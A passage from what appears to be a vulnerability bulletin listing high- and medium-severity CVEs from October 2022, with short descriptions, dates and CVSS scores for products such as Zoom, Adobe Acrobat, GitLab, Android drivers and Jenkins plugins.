zoom — meetings	Zoom Client for Meetings for macOS (Standard and for IT Admin) starting with 5.10.6 and prior to 5.12.0 contains a debugging port misconfiguration. When camera mode rendering context is enabled as part of the Zoom App Layers API by running certain Zoom Apps, a local debugging port is opened by the Zoom client. A local malicious user could use this debugging port to connect to and control the Zoom Apps running in the Zoom client.	2022-10-14	7.8	CVE-2022-28762 MISC
zoom — zoom_on-premise_meeting_connector_mmr	Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions.	2022-10-14	8.6	CVE-2022-28759 MISC

Medium Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
74cmsse — 74cmsse	74cmsSE v3.12.0 allows authenticated attackers with low-level privileges to arbitrarily change the rights and credentials of the Super Administrator account.	2022-10-17	6.5	CVE-2022-41471 MISC
74cmsse — 74cmsse	74cmsSE v3.12.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /apiadmin/notice/add. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.	2022-10-17	5.4	CVE-2022-41472 MISC
abpressoptimizer — ab_press_optimizer	Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Mammothology AB Press Optimizer plugin <= 1.1.1 on WordPress.	2022-10-17	4.8	CVE-2022-26375 CONFIRM CONFIRM
adobe — acrobat_reader_dc	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-35691 MISC
adobe — acrobat_reader_dc	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-38437 MISC
adobe — acrobat_reader_dc	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-38449 MISC
adobe — acrobat_reader_dc	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-42342 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction, but does require administrator privileges.	2022-10-14	4.9	CVE-2022-38423 MISC
adobe — commerce	Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution.	2022-10-14	5.4	CVE-2022-35698 MISC
adobe — commerce	Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the availability of a user’s minor feature. Exploitation of this issue does not require user interaction.	2022-10-14	5.3	CVE-2022-35689 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	5.5	CVE-2022-38443 MISC
aethon — tug_home_base_server	Aethon TUG Home Base Server versions prior to version 24 are affected by un unauthenticated attacker who can freely access hashed user credentials.	2022-10-21	6.1	CVE-2022-1059 MISC
aethon — tug_home_base_server	Aethon TUG Home Base Server versions prior to version 24 are affected by un unauthenticated attacker who can freely access hashed user credentials.	2022-10-21	5.4	CVE-2022-27494 MISC
apache — isis	Prior to 2.0.0-M9, it was possible for an end-user to set the value of an editable string property of a domain object to a value that would be rendered unchanged when the value was saved. In particular, the end-user could enter javascript or similar and this would be executed. As of this release, the inputted strings are properly escaped when rendered.	2022-10-19	6.1	CVE-2022-42466 MISC MLIST
apache — isis	When running in prototype mode, the h2 webconsole module (accessible from the Prototype menu) is automatically made available with the ability to directly query the database. It was felt that it is safer to require the developer to explicitly enable this capability. As of 2.0.0-M8, this can now be done using the ‘isis.prototyping.h2-console.web-allow-remote-access’ configuration property; the web console will be unavailable without setting this configuration. As an additional safeguard, the new ‘isis.prototyping.h2-console.generate-random-web-admin-password’ configuration parameter (enabled by default) requires that the administrator use a randomly generated password to use the console. The password is printed to the log, as “webAdminPass: xxx” (where “xxx”) is the password. To revert to the original behaviour, the administrator would therefore need to set these configuration parameter: isis.prototyping.h2-console.web-allow-remote-access=true isis.prototyping.h2-console.generate-random-web-admin-password=false Note also that the h2 webconsole is never available in production mode, so these safeguards are only to ensure that the webconsole is secured by default also in prototype mode.	2022-10-19	5.3	CVE-2022-42467 MISC MLIST
asus — system_control_interface	AsusSoftwareManager.exe in ASUS System Control Interface on ASUS personal computers (running Windows) allows a local user to write into the Temp directory and delete another more privileged file via SYSTEM privileges. This affects ASUS System Control Interface 3 before 3.1.5.0, AsusSoftwareManger.exe before 1.0.53.0, and AsusLiveUpdate.dll before 1.0.45.0.	2022-10-18	6	CVE-2022-36439 MISC MISC
atlassian — jira_align	The ManageJiraConnectors API in Atlassian Jira Align before version 10.109.2 allows remote attackers to exploit this issue to access internal network resources via a Server-Side Request Forgery. This can be exploited by a remote, unauthenticated attacker with Super Admin privileges by sending a specially crafted HTTP request.	2022-10-14	4.9	CVE-2022-36802 MISC
axiosys — bento4	An issue was discovered in Bento4 v1.6.0-639. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp, as demonstrated by mp42aac.	2022-10-19	6.5	CVE-2022-43032 MISC
axiosys — bento4	An issue was discovered in Bento4 1.6.0-639. There is a bad free in the component AP4_HdlrAtom::~AP4_HdlrAtom() which allows attackers to cause a Denial of Service (DoS) via a crafted input.	2022-10-19	6.5	CVE-2022-43033 MISC
axiosys — bento4	An issue was discovered in Bento4 v1.6.0-639. There is a heap buffer overflow vulnerability in the AP4_BitReader::SkipBits(unsigned int) function in mp42ts.	2022-10-19	6.5	CVE-2022-43034 MISC
axiosys — bento4	An issue was discovered in Bento4 v1.6.0-639. There is a heap-buffer-overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42aac.	2022-10-19	6.5	CVE-2022-43035 MISC
axiosys — bento4	An issue was discovered in Bento4 1.6.0-639. There is a memory leak in the function AP4_File::ParseStream in /Core/Ap4File.cpp.	2022-10-19	6.5	CVE-2022-43037 MISC
axiosys — bento4	Bento4 v1.6.0-639 was discovered to contain a heap overflow via the AP4_BitReader::ReadCache() function in mp42ts.	2022-10-19	6.5	CVE-2022-43038 MISC
cashier_queuing_system_project — cashier_queuing_system	A vulnerability, which was classified as problematic, has been found in SourceCodester Cashier Queuing System 1.0.1. This issue affects some unknown processing of the component User Creation Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-211187.	2022-10-18	6.1	CVE-2022-3580 MISC
cashier_queuing_system_project — cashier_queuing_system	A vulnerability, which was classified as problematic, was found in SourceCodester Cashier Queuing System 1.0. Affected is an unknown function of the component Cashiers Tab. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-211188.	2022-10-18	6.1	CVE-2022-3581 MISC
changingtec — rava_certificate_validation_system	RAVA certificate validation system has inadequate filtering for URL parameter. An unauthenticated remote attacker can perform SSRF attack to discover internal network topology base on query response.	2022-10-18	5.3	CVE-2022-39055 MISC
chop-chop — pop-up_chop_chop	Auth. Stored Cross-Site Scripting (XSS) in Pop-Up Chop Chop plugin <= 2.1.7 on WordPress.	2022-10-21	5.4	CVE-2022-41638 CONFIRM CONFIRM
codedropz — drag_and_drop_multiple_file_upload_-_contact_form_7	The Drag and Drop Multiple File Upload WordPress plugin before 1.3.6.5 does not properly check for the upload size limit set in forms, taking the value from user input sent when submitting the form. As a result, attackers could control the file length limit and bypass the limit set by admins in the contact form.	2022-10-17	4.3	CVE-2022-3282 MISC
corsair — k63_firmware	Missing AES encryption in Corsair K63 Wireless 3.1.3 allows physically proximate attackers to inject and sniff keystrokes via 2.4 GHz radio transmissions.	2022-10-19	6.8	CVE-2022-35860 MISC MISC MISC
designextreme — we’re_open	The Weâ€™re Open! WordPress plugin before 1.42 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-17	4.8	CVE-2022-3139 MISC
devhubapp — devhub	devhub 0.102.0 was discovered to contain a broken session control.	2022-10-17	5.4	CVE-2022-41542 MISC MISC MISC MISC
easyvista — service_manager	Cross Site Scripting (XSS) vulnerability in New equipment page in EasyVista Service Manager 2018.1.181.1 allows remote attackers to run arbitrary code via the notes field.	2022-10-20	5.4	CVE-2021-33231 MISC MISC
enalean — tuleap	Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In versions 12.9.99.228 and above, prior to 14.0.99.24, authorizations are not properly verified when updating the branch prefix used by the GitLab repository integration. Authenticated users can change the branch prefix of any of the GitLab repository integration they can see vie the REST endpoint `PATCH /gitlab_repositories/{id}`. This action should be restricted to Git administrators. This issue is patched in Tuleap Community Edition 14.0.99.24 and Tuleap Enterprise Edition 14.0-3. There are no known workarounds.	2022-10-19	5.4	CVE-2022-39233 MISC CONFIRM MISC MISC
f5 — big-ip_application_security_manager	In BIG-IP versions 16.1.x before 16.1.3, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5, and all versions of 13.1.x, and BIG-IQ versions 8.x before 8.2.0.1 and all versions of 7.x, when an SSL key is imported on a BIG-IP or BIG-IQ system, undisclosed input can cause MCPD to terminate.	2022-10-19	4.9	CVE-2022-41694 MISC
f5 — big-iq_centralized_management	In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, 14.1.x before 14.1.5.1, and all versions of 13.1.x, and BIG-IQ all versions of 8.x and 7.x, an authenticated iControl REST user can cause an increase in memory resource utilization, via undisclosed requests.	2022-10-19	6.5	CVE-2022-41770 MISC
f5 — f5os-c	In F5OS-A version 1.x before 1.1.0 and F5OS-C version 1.x before 1.4.0, a directory traversal vulnerability exists in an undisclosed location of the F5OS CLI that allows an attacker to read arbitrary files.	2022-10-19	5.5	CVE-2022-41780 MISC
fatcatapps — analytics_cat	Auth. (admin+) Stored Cross-Site Scripting (XSS) in Fatcat Apps Analytics Cat plugin <= 1.0.9 on WordPress.	2022-10-21	4.8	CVE-2022-40311 CONFIRM CONFIRM
fedoraproject — supybot-fedora	supybot-fedora implements the command ‘refresh’, that refreshes the cache of all users from FAS. This takes quite a while to run, and zodbot stops responding to requests during this time.	2022-10-18	5.3	CVE-2020-15853 MISC
garage_management_system_project — garage_management_system	A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.	2022-10-20	5.4	CVE-2022-41358 MISC MISC MISC MISC MISC
git-scm — git	Git is an open source, scalable, distributed revision control system. Versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 are subject to exposure of sensitive information to a malicious actor. When performing a local clone (where the source and target of the clone are on the same volume), Git copies the contents of the source’s `$GIT_DIR/objects` directory into the destination by either creating hardlinks to the source contents, or copying them (if hardlinks are disabled via `–no-hardlinks`). A malicious actor could convince a victim to clone a repository with a symbolic link pointing at sensitive information on the victim’s machine. This can be done either by having the victim clone a malicious repository on the same machine, or having them clone a malicious repository embedded as a bare repository via a submodule from any source, provided they clone with the `–recurse-submodules` option. Git does not create symbolic links in the `$GIT_DIR/objects` directory. The problem has been patched in the versions published on 2022-10-18, and backported to v2.30.x. Potential workarounds: Avoid cloning untrusted repositories using the `–local` optimization when on a shared machine, either by passing the `–no-local` option to `git clone` or cloning from a URL that uses the `file://` scheme. Alternatively, avoid cloning repositories from untrusted sources with `–recurse-submodules` or run `git config –global protocol.file.allow user`.	2022-10-19	5.5	CVE-2022-39253 CONFIRM
gitlab — gitlab	A business logic issue in the handling of large repositories in all versions of GitLab CE/EE from 10.0 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2 allowed an authenticated and authorized user to exhaust server resources by importing a malicious project.	2022-10-17	6.5	CVE-2022-2455 MISC MISC CONFIRM
gitlab — gitlab	A lack of length validation in Snippet descriptions in GitLab CE/EE affecting all versions prior to 15.1.6, 15.2 prior to 15.2.4 and 15.3 prior to 15.3.2 allows an authenticated attacker to create a maliciously large Snippet which when requested with or without authentication places excessive load on the server, potential leading to Denial of Service.	2022-10-17	6.5	CVE-2022-2592 MISC MISC CONFIRM
gitlab — gitlab	An issue has been discovered in the Import functionality of GitLab CE/EE affecting all versions starting from 14.4 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. It was possible for an authenticated user to read arbitrary projects’ content given the project’s ID.	2022-10-17	6.5	CVE-2022-3067 CONFIRM MISC MISC
gitlab — gitlab	An unhandled exception in job log parsing in GitLab CE/EE affecting all versions prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows an attacker to prevent access to job logs	2022-10-17	6.5	CVE-2022-3279 MISC MISC CONFIRM
gitlab — gitlab	Serialization of sensitive data in GitLab EE affecting all versions from 14.9 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 can leak sensitive information via cache	2022-10-17	6.5	CVE-2022-3291 CONFIRM MISC
gitlab — gitlab	An issue has been discovered in GitLab affecting all versions starting from 10.0 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. It was possible for an unauthorised user to create issues in a project.	2022-10-17	5.4	CVE-2022-3066 MISC MISC CONFIRM
gitlab — gitlab	Lack of IP address checking in GitLab EE affecting all versions from 14.2 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows a group member to bypass IP restrictions when using a deploy token	2022-10-17	5.3	CVE-2022-3286 CONFIRM MISC
gitlab — gitlab	A cross-site scripting issue has been discovered in GitLab CE/EE affecting all versions before 15.1.6, 15.2 to 15.2.4 and 15.3 prior to 15.3.2. It was possible to exploit a vulnerability in setting the labels colour feature which could lead to a stored XSS that allowed attackers to perform arbitrary actions on behalf of victims at client side.	2022-10-17	4.8	CVE-2022-2865 CONFIRM MISC MISC
gitlab — gitlab	An improper access control issue in GitLab CE/EE affecting all versions starting from 15.2 before 15.2.4, all versions from 15.3 before 15.3.2 allows disclosure of confidential information via the Incident timeline events.	2022-10-17	4.3	CVE-2022-2630 MISC CONFIRM MISC
gitlab — gitlab	A potential DoS vulnerability was discovered in Gitlab CE/EE versions starting from 10.7 before 15.1.5, all versions starting from 15.2 before 15.2.3, all versions starting from 15.3 before 15.3.1 allowed an attacker to trigger high CPU usage via a special crafted input added in the Commit message field.	2022-10-17	4.3	CVE-2022-2908 CONFIRM MISC MISC
gitlab — gitlab	An improper access control issue in GitLab CE/EE affecting all versions starting before 15.1.6, all versions from 15.2 before 15.2.4, all versions from 15.3 before 15.3.2 allows disclosure of pipeline status to unauthorized users.	2022-10-17	4.3	CVE-2022-3030 MISC MISC CONFIRM
gitlab — gitlab	A branch/tag name confusion in GitLab CE/EE affecting all versions prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1 allows an attacker to manipulate pages where the content of the default branch would be expected.	2022-10-17	4.3	CVE-2022-3288 CONFIRM MISC MISC
gitlab — gitlab	Email addresses were leaked in WebHook logs in GitLab EE affecting all versions from 9.3 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1	2022-10-17	4.3	CVE-2022-3293 MISC CONFIRM
gitlab — gitlab	Improper access control in the GitLab CE/EE API affecting all versions starting from 12.8 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. Allowed for editing the approval rules via the API by an unauthorised user.	2022-10-17	4.3	CVE-2022-3325 MISC CONFIRM
gitlab — gitlab	It was possible for a guest user to read a todo targeting an inaccessible note in Gitlab CE/EE affecting all versions from 15.0 prior to 15.2.5, 15.3 prior to 15.3.4, and 15.4 prior to 15.4.1.	2022-10-17	4.3	CVE-2022-3330 MISC CONFIRM
gitlab — gitlab	An issue has been discovered in GitLab EE affecting all versions starting from 14.5 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. GitLab’s Zentao integration has an insecure direct object reference vulnerability that may be exploited by an attacker to leak Zentao project issues.	2022-10-17	4.3	CVE-2022-3331 MISC CONFIRM MISC
gitlab — gitlab	An issue has been discovered in GitLab EE affecting all versions starting from 13.7 before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1. A user’s primary email may be disclosed to an attacker through group member events webhooks.	2022-10-17	4.3	CVE-2022-3351 MISC MISC CONFIRM
google — android	In jpg driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-2984 MISC
google — android	In camera driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-38671 MISC
google — android	In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-38672 MISC
google — android	In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-38673 MISC
google — android	In gpu driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-38676 MISC
google — android	In cell service, there is a missing permission check. This could lead to local denial of service in cell service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-38677 MISC
google — android	In music service, there is a missing permission check. This could lead to local denial of service in music service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-38679 MISC
google — android	In messaging service, there is a missing permission check. This could lead to local denial of service in messaging service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-38687 MISC
google — android	In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-38688 MISC
google — android	In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-38689 MISC
google — android	In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-38690 MISC
google — android	In messaging service, there is a missing permission check. This could lead to access unexpected provider in contacts service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-38697 MISC
google — android	In Gallery service, there is a missing permission check. This could lead to local denial of service in Gallery service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-39103 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39105 MISC
google — android	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-39112 MISC
google — android	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-39113 MISC
google — android	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-39114 MISC
google — android	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-39115 MISC
google — android	In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.	2022-10-14	5.5	CVE-2022-39117 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39120 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39121 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39122 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39123 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39124 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39125 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39126 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39127 MISC
google — android	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	5.5	CVE-2022-39128 MISC
gpac — gpac	GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_meta_restore_items_ref at /isomedia/meta.c.	2022-10-19	5.5	CVE-2022-43039 MISC
gpac — gpac	GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function BD_CheckSFTimeOffset at /bifs/field_decode.c.	2022-10-19	5.5	CVE-2022-43043 MISC
gpac — gpac	GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_get_meta_item_info at /isomedia/meta.c.	2022-10-19	5.5	CVE-2022-43044 MISC
gpac — gpac	GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_dump_vrml_sffield at /scene_manager/scene_dump.c.	2022-10-19	5.5	CVE-2022-43045 MISC
helpful_project — helpful	The Helpful WordPress plugin before 4.5.26 puts the exported logs and feedbacks in a publicly accessible location and guessable names, which could allow attackers to download them and retrieve sensitive information such as IP, Names and Email Address depending on the plugin’s settings	2022-10-17	5.3	CVE-2022-2834 MISC
hospital_management_system_project — hospital_management_system	PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php.	2022-10-21	5.4	CVE-2022-42205 MISC
hospital_management_system_project — hospital_management_system	PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php.	2022-10-21	5.4	CVE-2022-42206 MISC
huawei — emui	Uncaptured exceptions in the home screen module. Successful exploitation of this vulnerability may affect stability.	2022-10-14	5.3	CVE-2022-41587 MISC
hunter2_project — hunter2	An issue has been discovered in hunter2 affecting all versions before 2.1.0. Improper handling of auto-completion input allows an authenticated attacker to extract other users email addresses	2022-10-17	6.5	CVE-2022-3540 CONFIRM MISC
ikea — tradfri_gateway_e1526_firmware	A single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI gateway unresponsive, such that connected lighting cannot be controlled with the IKEA Home Smart app and TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score: 6.5 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H	2022-10-14	6.5	CVE-2022-39065 MISC
jenkins — 360_fireline	Jenkins 360 FireLine Plugin 1.7.2 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download.	2022-10-19	5.3	CVE-2022-43435 CONFIRM MLIST
jenkins — compuware_source_code_download_for_endevor,_pds,_and_ispw	Jenkins Compuware Source Code Download for Endevor, PDS, and ISPW Plugin 2.0.12 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process.	2022-10-19	5.3	CVE-2022-43423 CONFIRM MLIST
jenkins — compuware_strobe_measurement	Jenkins Compuware Strobe Measurement Plugin 1.0.1 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.	2022-10-19	4.3	CVE-2022-43431 CONFIRM MLIST
jenkins — compuware_topax_for_total_test	Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process.	2022-10-19	5.3	CVE-2022-43428 CONFIRM MLIST
jenkins — compuware_topaz_for_total_test	Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.	2022-10-19	4.3	CVE-2022-43427 CONFIRM MLIST
jenkins — compuware_topaz_utilities	Jenkins Compuware Topaz Utilities Plugin 1.0.8 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process.	2022-10-19	5.3	CVE-2022-43422 CONFIRM MLIST
jenkins — compuware_xpediter_code	Jenkins Compuware Xpediter Code Coverage Plugin 1.0.7 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to obtain the values of Java system properties from the Jenkins controller process.	2022-10-19	5.3	CVE-2022-43424 CONFIRM MLIST
jenkins — contrast_continuous_application_security	Jenkins Contrast Continuous Application Security Plugin 3.9 and earlier does not escape data returned from the Contrast service when generating a report, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control or modify Contrast service API responses.	2022-10-19	5.4	CVE-2022-43420 CONFIRM MLIST
jenkins — custom_checkbox_parameter	Jenkins Custom Checkbox Parameter Plugin 1.4 and earlier does not escape the name and description of Custom Checkbox Parameter parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.	2022-10-19	5.4	CVE-2022-43425 CONFIRM MLIST
jenkins — generic_webhook_trigger	Jenkins Generic Webhook Trigger Plugin 1.84.1 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.	2022-10-19	5.3	CVE-2022-43412 CONFIRM MLIST
jenkins — gitlab	Jenkins GitLab Plugin 1.5.35 and earlier uses a non-constant time comparison function when checking whether the provided and expected webhook token are equal, potentially allowing attackers to use statistical methods to obtain a valid webhook token.	2022-10-19	5.3	CVE-2022-43411 CONFIRM MLIST
jenkins — job_import	Jenkins Job Import Plugin 3.5 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.	2022-10-19	4.3	CVE-2022-43413 CONFIRM MLIST
jenkins — katalon	Jenkins Katalon Plugin 1.0.32 and earlier stores API keys unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.	2022-10-19	6.5	CVE-2022-43419 CONFIRM MLIST
jenkins — katalon	Jenkins Katalon Plugin 1.0.32 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.	2022-10-19	4.3	CVE-2022-43417 CONFIRM MLIST
jenkins — katalon	A cross-site request forgery (CSRF) vulnerability in Jenkins Katalon Plugin 1.0.33 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.	2022-10-19	4.3	CVE-2022-43418 CONFIRM MLIST
jenkins — neuvector_vulnerability_scanner	Jenkins NeuVector Vulnerability Scanner Plugin 1.20 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download.	2022-10-19	5.3	CVE-2022-43434 CONFIRM MLIST
jenkins — nunit	Jenkins NUnit Plugin 0.27 and earlier implements an agent-to-controller message that parses files inside a user-specified directory as test results, allowing attackers able to control agent processes to obtain test results from files in an attacker-specified directory on the Jenkins controller.	2022-10-19	5.3	CVE-2022-43414 CONFIRM MLIST
jenkins — s3_explorer	Jenkins S3 Explorer Plugin 1.0.8 and earlier does not mask the AWS_SECRET_ACCESS_KEY form field, increasing the potential for attackers to observe and capture it.	2022-10-19	5.3	CVE-2022-43426 CONFIRM MLIST
jenkins — screenrecorder	Jenkins ScreenRecorder Plugin 0.7 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download.	2022-10-19	4.3	CVE-2022-43433 CONFIRM MLIST
jenkins — stage_view	Jenkins Pipeline: Stage View Plugin 2.26 and earlier does not correctly encode the ID of ‘input’ steps when using it to generate URLs to proceed or abort Pipeline builds, allowing attackers able to configure Pipelines to specify ‘input’ step IDs resulting in URLs that would bypass the CSRF protection of any target URL in Jenkins.	2022-10-19	6.5	CVE-2022-43408 CONFIRM MLIST
